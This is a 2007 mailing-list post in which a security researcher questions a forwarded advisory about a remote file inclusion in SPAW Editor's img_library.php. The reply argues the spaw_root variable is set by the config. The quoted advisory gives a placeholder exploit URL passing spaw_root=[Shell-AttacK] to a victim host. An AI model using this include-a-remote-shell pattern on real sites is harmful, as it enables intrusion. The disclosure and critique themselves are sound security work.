[VIM] [Fwd: SPAW Editor PHP Edition]

Ferdy Riphagen f.riphagen at nsec.nl
Fri Mar 2 15:14:21 EST 2007


The file mentioned here is only a patch.

img_library,php contains:
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';

With a install you have to rename 
"../config/spaw_control.default.config.php" to 
"../config/spaw_control.config.php"

spaw_control.config.php contains:
// calculate root folder for spaw files
$spaw_root = realpath(dirname(__FILE__)."/..");
$spaw_root = str_replace("\\","/",$spaw_root);
if (!ereg('/$', $spaw_root))
  $spaw_root = $spaw_root."/";

The patch is for the "zend_hash_del_key_or_index" vulnerability by using 
the hashes for "spaw_imglib_include" (-86707544, -411170602)

--Ferdy--



-------- Original Message --------

Remote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4

Discovered By : Hasadya Raed
Contact Me : RaeD[at]BsdMail[dot]Com
Download Script:
http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip 

B.File :img_library.php :
include $spaw_root.'class/util.class.php'; 
include $spaw_root.'class/lang.class.php'; 

=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=

Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK]


By Hasadya Raed


-- 
_______________________________________________
Get your free email from http://bsdmail.com




More information about the VIM mailing list